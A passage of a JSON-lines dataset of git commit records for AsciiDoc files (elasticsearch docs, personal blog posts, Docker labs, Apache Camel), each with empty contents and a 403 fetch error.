sticsearch,pritishppai\/elasticsearch,mmaracic\/elasticsearch,kingaj\/elasticsearch,dylan8902\/elasticsearch,pritishppai\/elasticsearch,qwerty4030\/elasticsearch,nrkkalyan\/elasticsearch,tsohil\/elasticsearch,huanzhong\/elasticsearch,areek\/elasticsearch,knight1128\/elasticsearch,lydonchandra\/elasticsearch,huypx1292\/elasticsearch,himanshuag\/elasticsearch,acchen97\/elasticsearch,davidvgalbraith\/elasticsearch,nezirus\/elasticsearch,kalburgimanjunath\/elasticsearch,vingupta3\/elasticsearch,hechunwen\/elasticsearch,beiske\/elasticsearch,pranavraman\/elasticsearch,scottsom\/elasticsearch,thecocce\/elasticsearch,winstonewert\/elasticsearch,MjAbuz\/elasticsearch,LeoYao\/elasticsearch,hirdesh2008\/elasticsearch,trangvh\/elasticsearch,ImpressTV\/elasticsearch,MichaelLiZhou\/elasticsearch,mortonsykes\/elasticsearch,xingguang2013\/elasticsearch,pritishppai\/elasticsearch,rento19962\/elasticsearch,jaynblue\/elasticsearch,polyfractal\/elasticsearch,EasonYi\/elasticsearch,polyfractal\/elasticsearch,alexkuk\/elasticsearch,yanjunh\/elasticsearch,caengcjd\/elasticsearch,btiernay\/elasticsearch,MaineC\/elasticsearch,clintongormley\/elasticsearch,jw0201\/elastic,masaruh\/elasticsearch,yongminxia\/elasticsearch,mikemccand\/elasticsearch,skearns64\/elasticsearch,pozhidaevak\/elasticsearch,drewr\/elasticsearch,elasticdog\/elasticsearch,mbrukman\/elasticsearch,palecur\/elasticsearch,kaneshin\/elasticsearch,likaiwalkman\/elasticsearch,zeroctu\/elasticsearch,schonfeld\/elasticsearch,Helen-Zhao\/elasticsearch,ESamir\/elasticsearch,camilojd\/elasticsearch,Widen\/elasticsearch,hirdesh2008\/elasticsearch,achow\/elasticsearch,ThalaivaStars\/OrgRepo1,mrorii\/elasticsearch,ivansun1010\/elasticsearch,queirozfcom\/elasticsearch,davidvgalbraith\/elasticsearch,yynil\/elasticsearch,yongminxia\/elasticsearch,likaiwalkman\/elasticsearch,franklanganke\/elasticsearch,sreeramjayan\/elasticsearch,lydonchandra\/elasticsearch,ImpressTV\/elasticsearch,elasticdog\/elasticsearch,zkidkid\/elasticsearch,vietlq\/elasticsearch,martinstuga\/elasticsearch,infusionsoft\/elasticsearch,mbrukman\/elasticsearch,skearns64\/elasticsearch,geidies\/elasticsearch,HarishAtGitHub\/elasticsearch,myelin\/elasticsearch,ThalaivaStars\/OrgRepo1,djschny\/elasticsearch,geidies\/elasticsearch,sposam\/elasticsearch,snikch\/elasticsearch,mohit\/elasticsearch,nknize\/elasticsearch,kunallimaye\/elasticsearch,strapdata\/elassandra-test,ESamir\/elasticsearch,wittyameta\/elasticsearch,kalburgimanjunath\/elasticsearch,mcku\/elasticsearch,kunallimaye\/elasticsearch,lchennup\/elasticsearch,sc0ttkclark\/elasticsearch,Chhunlong\/elasticsearch,Collaborne\/elasticsearch,vietlq\/elasticsearch,Charlesdong\/elasticsearch,Ansh90\/elasticsearch,ivansun1010\/elasticsearch,pritishppai\/elasticsearch,yuy168\/elasticsearch,yongminxia\/elasticsearch,mrorii\/elasticsearch,wangtuo\/elasticsearch,nezirus\/elasticsearch,Shekharrajak\/elasticsearch,ulkas\/elasticsearch,strapdata\/elassandra5-rc,lchennup\/elasticsearch,yongminxia\/elasticsearch,vingupta3\/elasticsearch,markwalkom\/elasticsearch,AshishThakur\/elasticsearch,smflorentino\/elasticsearch,kenshin233\/elasticsearch,scorpionvicky\/elasticsearch,kubum\/elasticsearch,myelin\/elasticsearch,IanvsPoplicola\/elasticsearch,franklanganke\/elasticsearch,wittyameta\/elasticsearch,MichaelLiZhou\/elasticsearch,phani546\/elasticsearch,tahaemin\/elasticsearch,diendt\/elasticsearch,golubev\/elasticsearch,jimhooker2002\/elasticsearch,MetSystem\/elasticsearch,wenpos\/elasticsearch,mjhennig\/elasticsearch,iantruslove\/elasticsearch,djschny\/elasticsearch,humandb\/elasticsearch,ImpressTV\/elasticsearch,masterweb121\/elasticsearch,mcku\/elasticsearch,scottsom\/elasticsearch,nrkkalyan\/elasticsearch,andrestc\/elasticsearch,MjAbuz\/elasticsearch,mjhennig\/elasticsearch,mute\/elasticsearch,geidies\/elasticsearch,karthikjaps\/elasticsearch,nazarewk\/elasticsearch,wayeast\/elasticsearch,hafkensite\/elasticsearch,abibell\/elasticsearch,easonC\/elasticsearch,jeteve\/elasticsearch,fooljohnny\/elasticsearch,xuzha\/elasticsearch,pranavraman\/elasticsearch,likaiwalkman\/elasticsearch,javachengwc\/elasticsearch,zeroctu\/elasticsearch,khiraiwa\/elasticsearch,Shekharrajak\/elasticsearch,mjhennig\/elasticsearch,mgalushka\/elasticsearch,kimimj\/elasticsearch,gmarz\/elasticsearch,vietlq\/elasticsearch,GlenRSmith\/elasticsearch,fekaputra\/elasticsearch,pranavraman\/elasticsearch,himanshuag\/elasticsearch,Liziyao\/elasticsearch,obourgain\/elasticsearch,wayeast\/elasticsearch,slavau\/elasticsearch,strapdata\/elassandra5-rc,Charlesdong\/elasticsearch,camilojd\/elasticsearch,umeshdangat\/elasticsearch,chirilo\/elasticsearch,tkssharma\/elasticsearch,ricardocerq\/elasticsearch,amit-shar\/elasticsearch,luiseduardohdbackup\/elasticsearch,tkssharma\/elasticsearch,pablocastro\/elasticsearch,wbowling\/elasticsearch,ckclark\/elasticsearch,loconsolutions\/elasticsearch,glefloch\/elasticsearch,luiseduardohdbackup\/elasticsearch,gingerwizard\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Ansh90\/elasticsearch,alexbrasetvik\/elasticsearch,strapdata\/elassandra5-rc,mnylen\/elasticsearch,zkidkid\/elasticsearch,yynil\/elasticsearch,alexkuk\/elasticsearch,springning\/elasticsearch,AndreKR\/elasticsearch,thecocce\/elasticsearch,infusionsoft\/elasticsearch,kubum\/elasticsearch,lmtwga\/elasticsearch,rmuir\/elasticsearch,winstonewert\/elasticsearch,tebriel\/elasticsearch,Shekharrajak\/elasticsearch,elancom\/elasticsearch,shreejay\/elasticsearch,fred84\/elasticsearch,pablocastro\/elasticsearch,humandb\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,ouyangkongtong\/elasticsearch,koxa29\/elasticsearch,vietlq\/elasticsearch,elancom\/elasticsearch,ulkas\/elasticsearch,djschny\/elasticsearch,TonyChai24\/ESSource,adrianbk\/elasticsearch,trangvh\/elasticsearch,diendt\/elasticsearch,khiraiwa\/elasticsearch,xpandan\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,onegambler\/elasticsearch,iamjakob\/elasticsearch,aglne\/elasticsearch,MaineC\/elasticsearch,jango2015\/elasticsearch,TonyChai24\/ESSource,kunallimaye\/elasticsearch,iamjakob\/elasticsearch,huanzhong\/elasticsearch,hanswang\/elasticsearch,Uiho\/elasticsearch,jeteve\/elasticsearch,F0lha\/elasticsearch,mmaracic\/elasticsearch,artnowo\/elasticsearch,jpountz\/elasticsearch,andrestc\/elasticsearch,yongminxia\/elasticsearch,lzo\/elasticsearch-1,mohit\/elasticsearch,wimvds\/elasticsearch,nomoa\/elasticsearch,iantruslove\/elasticsearch,knight1128\/elasticsearch,girirajsharma\/elasticsearch,rento19962\/elasticsearch,alexbrasetvik\/elasticsearch,dylan8902\/elasticsearch,martinstuga\/elasticsearch,mrorii\/elasticsearch,KimTaehee\/elasticsearch,aglne\/elasticsearch,tahaemin\/elasticsearch,gmarz\/elasticsearch,i-am-Nathan\/elasticsearch,masterweb121\/elasticsearch,milodky\/elasticsearch,davidvgalbraith\/elasticsearch,nomoa\/elasticsearch,F0lha\/elasticsearch,khiraiwa\/elasticsearch,amaliujia\/elasticsearch,strapdata\/elassandra-test,brandonkearby\/elasticsearch,sposam\/elasticsearch,brandonkearby\/elasticsearch,mm0\/elasticsearch,jpountz\/elasticsearch,rhoml\/elasticsearch,nilabhsagar\/elasticsearch,Collaborne\/elasticsearch,mm0\/elasticsearch,markwalkom\/elasticsearch,amaliujia\/elasticsearch,nilabhsagar\/elasticsearch,snikch\/elasticsearch,knight1128\/elasticsearch,EasonYi\/elasticsearch,golubev\/elasticsearch,wittyameta\/elasticsearch,jprante\/elasticsearch,IanvsPoplicola\/elasticsearch,petabytedata\/elasticsearch,huypx1292\/elasticsearch,pozhidaevak\/elasticsearch,linglaiyao1314\/elasticsearch,jsgao0\/elasticsearch,polyfractal\/elasticsearch,jprante\/elasticsearch,njlawton\/elasticsearch,andrestc\/elasticsearch,cnfire\/elasticsearch-1,dongjoon-hyun\/elasticsearch,mkis-\/elasticsearch,queirozfcom\/elasticsearch,adrianbk\/elasticsearch,smflorentino\/elasticsearch,girirajsharma\/elasticsearch,alexbrasetvik\/elasticsearch,lzo\/elasticsearch-1,skearns64\/elasticsearch,queirozfcom\/elasticsearch,jprante\/elasticsearch,cnfire\/elasticsearch-1,rajanm\/elasticsearch,obourgain\/elasticsearch,pablocastro\/elasticsearch,kevinkluge\/elasticsearch,tsohil\/elasticsearch,mohit\/elasticsearch,jbertouch\/elasticsearch,wimvds\/elasticsearch,maddin2016\/elasticsearch,a2lin\/elasticsearch,slavau\/elasticsearch,pozhidaevak\/elasticsearch,kalimatas\/elasticsearch,sneivandt\/elasticsearch,easonC\/elasticsearch,jprante\/elasticsearch,yuy168\/elasticsearch,ImpressTV\/elasticsearch,ZTE-PaaS\/elasticsearch,Kakakakakku\/elasticsearch,Uiho\/elasticsearch,luiseduardohdbackup\/elasticsearch,gmarz\/elasticsearch,artnowo\/elasticsearch,schonfeld\/elasticsearch,xpandan\/elasticsearch,mohit\/elasticsearch,kimimj\/elasticsearch,ricardocerq\/elasticsearch,socialrank\/elasticsearch,AshishThakur\/elasticsearch,caengcjd\/elasticsearch,koxa29\/elasticsearch,a2lin\/elasticsearch,overcome\/elasticsearch,PhaedrusTheGreek\/elasticsearch,markharwood\/elasticsearch,zhiqinghuang\/elasticsearch,ESamir\/elasticsearch,rlugojr\/elasticsearch,fooljohnny\/elasticsearch,smflorentino\/elasticsearch,vietlq\/elasticsearch,StefanGor\/elasticsearch,naveenhooda2000\/elasticsearch,humandb\/elasticsearch,Flipkart\/elasticsearch,zeroctu\/elasticsearch,tebriel\/elasticsearch,vingupta3\/elasticsearch,fforbeck\/elasticsearch,markllama\/elasticsearch,Fsero\/elasticsearch,18098924759\/elasticsearch,overcome\/elasticsearch,mnylen\/elasticsearch,naveenhooda2000\/elasticsearch,dataduke\/elasticsearch,likaiwalkman\/elasticsearch,nellicus\/elasticsearch,acchen97\/elasticsearch,caengcjd\/elasticsearch,MetSystem\/elasticsearch,xpandan\/elasticsearch,wangtuo\/elasticsearch,JSCooke\/elasticsearch,mjason3\/elasticsearch,andrejserafim\/elasticsearch,palecur\/elasticsearch,AshishThakur\/elasticsearch,smflorentino\/elasticsearch,hydro2k\/elasticsearch,hirdesh2008\/elasticsearch,NBSW\/elasticsearch,LeoYao\/elasticsearch,jsgao0\/elasticsearch,kaneshin\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,myelin\/elasticsearch,weipinghe\/elasticsearch,kaneshin\/elasticsearch,bestwpw\/elasticsearch,vietlq\/elasticsearch,markllama\/elasticsearch,mortonsykes\/elasticsearch,HonzaKral\/elasticsearch,masterweb121\/elasticsearch,humandb\/elasticsearch,dpursehouse\/elasticsearch,gfyoung\/elasticsearch,vvcephei\/elasticsearch,KimTaehee\/elasticsearch,cnfire\/elasticsearch-1,ZTE-PaaS\/elasticsearch,btiernay\/elasticsearch,IanvsPoplicola\/elasticsearch,queirozfcom\/elasticsearch,truemped\/elasticsearch,hirdesh2008\/elasticsearch,jw0201\/elastic,lchennup\/elasticsearch,coding0011\/elasticsearch,slavau\/elasticsearch,pozhidaevak\/elasticsearch,xingguang2013\/elasticsearch,petabytedata\/elasticsearch,nellicus\/elasticsearch,EasonYi\/elasticsearch,Ansh90\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,zhiqinghuang\/elasticsearch,girirajsharma\/elasticsearch,overcome\/elasticsearch,yanjunh\/elasticsearch,HarishAtGitHub\/elasticsearch,rmuir\/elasticsearch,trangvh\/elasticsearch,strapdata\/elassandra,ckclark\/elasticsearch,uschindler\/elasticsearch,mbrukman\/elasticsearch,dylan8902\/elasticsearch,JervyShi\/elasticsearch,Stacey-Gammon\/elasticsearch,maddin2016\/elasticsearch,MetSystem\/elasticsearch,robin13\/elasticsearch,iamjakob\/elasticsearch,chirilo\/elasticsearch,AndreKR\/elasticsearch,nazarewk\/elasticsearch,kenshin233\/elasticsearch,henakamaMSFT\/elasticsearch,sreeramjayan\/elasticsearch,shreejay\/elasticsearch,mbrukman\/elasticsearch,lightslife\/elasticsearch,snikch\/elasticsearch,jw0201\/elastic,wittyameta\/elasticsearch,javachengwc\/elasticsearch,winstonewert\/elasticsearch,ivansun1010\/elasticsearch,PhaedrusTheGreek\/elasticsearch,kubum\/elasticsearch,tebriel\/elasticsearch,camilojd\/elasticsearch,rento19962\/elasticsearch,kimimj\/elasticsearch,mbrukman\/elasticsearch,gfyoung\/elasticsearch,rmuir\/elasticsearch,davidvgalbraith\/elasticsearch,zeroctu\/elasticsearch,StefanGor\/elasticsearch,dylan8902\/elasticsearch,kingaj\/elasticsearch,kalburgimanjunath\/elasticsearch,sarwarbhuiyan\/elasticsearch,jchampion\/elasticsearch,schonfeld\/elasticsearch,knight1128\/elasticsearch,sdauletau\/elasticsearch,nellicus\/elasticsearch,masterweb121\/elasticsearch,masterweb121\/elasticsearch,springning\/elasticsearch,AshishThakur\/elasticsearch,szroland\/elasticsearch,areek\/elasticsearch,szroland\/elasticsearch,luiseduardohdbackup\/elasticsearch,wenpos\/elasticsearch,pranavraman\/elasticsearch,Helen-Zhao\/elasticsearch,jaynblue\/elasticsearch,yanjunh\/elasticsearch,iantruslove\/elasticsearch,khiraiwa\/elasticsearch,cwurm\/elasticsearch,Chhunlong\/elasticsearch,vingupta3\/elasticsearch,pozhidaevak\/elasticsearch,skearns64\/elasticsearch,Widen\/elasticsearch,JackyMai\/elasticsearch,fekaputra\/elasticsearch,18098924759\/elasticsearch,nellicus\/elasticsearch,ulkas\/elasticsearch,himanshuag\/elasticsearch,tkssharma\/elasticsearch,davidvgalbraith\/elasticsearch,javachengwc\/elasticsearch,xpandan\/elasticsearch,cnfire\/elasticsearch-1,coding0011\/elasticsearch,mcku\/elasticsearch,weipinghe\/elasticsearch,socialrank\/elasticsearch,socialrank\/elasticsearch,HonzaKral\/elasticsearch,wbowling\/elasticsearch,martinstuga\/elasticsearch,abibell\/elasticsearch,mjhennig\/elasticsearch,amaliujia\/elasticsearch,iacdingping\/elasticsearch,wenpos\/elasticsearch,jsgao0\/elasticsearch,onegambler\/elasticsearch,Charlesdong\/elasticsearch,achow\/elasticsearch,i-am-Nathan\/elasticsearch,nellicus\/elasticsearch,springning\/elasticsearch,wimvds\/elasticsearch,fekaputra\/elasticsearch,henakamaMSFT\/elasticsearch,nazarewk\/elasticsearch,winstonewert\/elasticsearch,schonfeld\/elasticsearch,snikch\/elasticsearch,bestwpw\/elasticsearch,Flipkart\/elasticsearch,avikurapati\/elasticsearch,ESamir\/elasticsearch,mjhennig\/elasticsearch,Helen-Zhao\/elasticsearch,StefanGor\/elasticsearch,kunallimaye\/elasticsearch,amaliujia\/elasticsearch,huypx1292\/elasticsearch,brandonkearby\/elasticsearch,lzo\/elasticsearch-1,JervyShi\/elasticsearch,mute\/elasticsearch,truemped\/elasticsearch,Ansh90\/elasticsearch,ivansun1010\/elasticsearch,areek\/elasticsearch,sauravmondallive\/elasticsearch,naveenhooda2000\/elasticsearch,jeteve\/elasticsearch,andrejserafim\/elasticsearch,drewr\/elasticsearch,HarishAtGitHub\/elasticsearch,trangvh\/elasticsearch,gingerwizard\/elasticsearch,Collaborne\/elasticsearch,mohit\/elasticsearch,liweinan0423\/elasticsearch,lchennup\/elasticsearch,xuzha\/elasticsearch,rajanm\/elasticsearch,wbowling\/elasticsearch,tkssharma\/elasticsearch,umeshdangat\/elasticsearch,YosuaMichael\/elasticsearch,alexkuk\/elasticsearch,javachengwc\/elasticsearch,kubum\/elasticsearch,sauravmondallive\/elasticsearch,karthikjaps\/elasticsearch,jeteve\/elasticsearch,avikurapati\/elasticsearch,himanshuag\/elasticsearch,skearns64\/elasticsearch,vroyer\/elassandra,yynil\/elasticsearch,apepper\/elasticsearch,infusionsoft\/elasticsearch,C-Bish\/elasticsearch,MisterAndersen\/elasticsearch,mute\/elasticsearch,Rygbee\/elasticsearch,Uiho\/elasticsearch,kalburgimanjunath\/elasticsearch,fernandozhu\/elasticsearch,karthikjaps\/elasticsearch,amit-shar\/elasticsearch,vingupta3\/elasticsearch,jango2015\/elasticsearch,springning\/elasticsearch,masaruh\/elasticsearch,MisterAndersen\/elasticsearch,lchennup\/elasticsearch,tebriel\/elasticsearch,AndreKR\/elasticsearch,shreejay\/elasticsearch,drewr\/elasticsearch,episerver\/elasticsearch,Ansh90\/elasticsearch,lightslife\/elasticsearch,LewayneNaidoo\/elasticsearch,socialrank\/elasticsearch,jbertouch\/elasticsearch,mcku\/elasticsearch,alexshadow007\/elasticsearch,Shepard1212\/elasticsearch,milodky\/elasticsearch,markharwood\/elasticsearch,iamjakob\/elasticsearch,thecocce\/elasticsearch,rento19962\/elasticsearch,mkis-\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,vvcephei\/elasticsearch,LewayneNaidoo\/elasticsearch,lmtwga\/elasticsearch,TonyChai24\/ESSource,sdauletau\/elasticsearch,onegambler\/elasticsearch,rlugojr\/elasticsearch,mm0\/elasticsearch,djschny\/elasticsearch,fernandozhu\/elasticsearch,infusionsoft\/elasticsearch,humandb\/elasticsearch,jeteve\/elasticsearch,Uiho\/elasticsearch,xingguang2013\/elasticsearch,Kakakakakku\/elasticsearch,andrejserafim\/elasticsearch,JervyShi\/elasticsearch,amit-shar\/elasticsearch,F0lha\/elasticsearch,abibell\/elasticsearch,jimhooker2002\/elasticsearch,abibell\/elasticsearch,kcompher\/elasticsearch,Siddartha07\/elasticsearch,markharwood\/elasticsearch,SergVro\/elasticsearch,kaneshin\/elasticsearch,obourgain\/elasticsearch,jbertouch\/elasticsearch,hafkensite\/elasticsearch,karthikjaps\/elasticsearch,tahaemin\/elasticsearch,karthikjaps\/elasticsearch,jimhooker2002\/elasticsearch,18098924759\/elasticsearch,ydsakyclguozi\/elasticsearch,Siddartha07\/elasticsearch,jimhooker2002\/elasticsearch,myelin\/elasticsearch,kalimatas\/elasticsearch,jeteve\/elasticsearch,maddin2016\/elasticsearch,easonC\/elasticsearch,jpountz\/elasticsearch,wangyuxue\/elasticsearch,Kakakakakku\/elasticsearch,sposam\/elasticsearch,Collaborne\/elasticsearch,njlawton\/elasticsearch,rento19962\/elasticsearch,knight1128\/elasticsearch,koxa29\/elasticsearch,Widen\/elasticsearch,ThalaivaStars\/OrgRepo1","old_file":"docs\/reference\/setup\/repositories.asciidoc","new_file":"docs\/reference\/setup\/repositories.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25f0c24827f9f5360bac74f1b4e34c0d4c5cf841","subject":"Update 2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","message":"Update 2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1ee27d0c8317723aef839c1546358b8af3428c6","subject":"y2b create post What's Hidden Inside This iPhone Case?","message":"y2b create post What's Hidden Inside This iPhone Case?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-26-Whats-Hidden-Inside-This-iPhone-Case.adoc","new_file":"_posts\/2016-07-26-Whats-Hidden-Inside-This-iPhone-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54067289039c6c8b1bdd2664a4932d3fba27863a","subject":"fixed https:\/\/github.com\/docker\/labs\/issues\/350","message":"fixed https:\/\/github.com\/docker\/labs\/issues\/350\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c6531493f610e553d262a20297f1cd8e3550acf5","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37f7ed2f410f877463343e5c1272bbf23f7a5646","subject":"Update 2016-12-30-Kleptography-in-RSA.adoc","message":"Update 2016-12-30-Kleptography-in-RSA.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec74bf5e69db50c7ec504d114c14c7e13fdd7534","subject":"Update 2016-6-27-file-getput-contents.adoc","message":"Update 2016-6-27-file-getput-contents.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-file-getput-contents.adoc","new_file":"_posts\/2016-6-27-file-getput-contents.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec5fa9ca67164d700b4ef97b8a4cf7846200698f","subject":"dump from clbin of lecture notes cidr + layering","message":"dump from clbin of lecture notes cidr + layering","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture07_20190927.adoc","new_file":"lecture07_20190927.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e10aba1ad470eae6479a1fa6bbc14be60f224c7","subject":"Update 2017-01-23-Deprecated-annotation-in-Java-9.adoc","message":"Update 2017-01-23-Deprecated-annotation-in-Java-9.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2017-01-23-Deprecated-annotation-in-Java-9.adoc","new_file":"_posts\/2017-01-23-Deprecated-annotation-in-Java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5db5515c4d9327135a1c9bb05b577d114b3c8ba5","subject":"fixing https:\/\/github.com\/docker\/labs\/issues\/211","message":"fixing https:\/\/github.com\/docker\/labs\/issues\/211\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c42459842af0c3a949068f932ad38c27cf5ce735","subject":"Publish 2015-2-10-.adoc","message":"Publish 2015-2-10-.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"2015-2-10-.adoc","new_file":"2015-2-10-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8821f165b19b9ed7b8a59db04e8d96396181bbba","subject":"Update 2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","message":"Update 2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","new_file":"_posts\/2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b087b72007efde63930247a5046087ef607f682","subject":"Update 2017-12-01-Solution-to-Long-Hours-of-Sitting.adoc","message":"Update 2017-12-01-Solution-to-Long-Hours-of-Sitting.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-01-Solution-to-Long-Hours-of-Sitting.adoc","new_file":"_posts\/2017-12-01-Solution-to-Long-Hours-of-Sitting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"906100a427c790718f9d04f091e985741871e025","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d35b4e87b61acf1022d232f0c2d659cd91f604a7","subject":"Added caffeine lrucache docs","message":"Added caffeine lrucache docs\n","repos":"tadayosi\/camel,tadayosi\/camel,cunningt\/camel,gnodet\/camel,pax95\/camel,adessaigne\/camel,cunningt\/camel,tadayosi\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,adessaigne\/camel,pmoerenhout\/camel,tdiesler\/camel,christophd\/camel,adessaigne\/camel,apache\/camel,apache\/camel,christophd\/camel,tdiesler\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,apache\/camel,nikhilvibhav\/camel,gnodet\/camel,pax95\/camel,tdiesler\/camel,pmoerenhout\/camel,pax95\/camel,tdiesler\/camel,adessaigne\/camel,tdiesler\/camel,gnodet\/camel,pmoerenhout\/camel,cunningt\/camel,pmoerenhout\/camel,apache\/camel,apache\/camel,gnodet\/camel,nikhilvibhav\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,gnodet\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,cunningt\/camel,christophd\/camel,tdiesler\/camel,apache\/camel,pax95\/camel,christophd\/camel,nikhilvibhav\/camel","old_file":"components\/camel-caffeine-lrucache\/src\/main\/docs\/caffeine-lrucache.adoc","new_file":"components\/camel-caffeine-lrucache\/src\/main\/docs\/caffeine-lrucache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"69d79a40fd5262d838fe09d027b0c2425a7d55ae","subject":"update title","message":"update 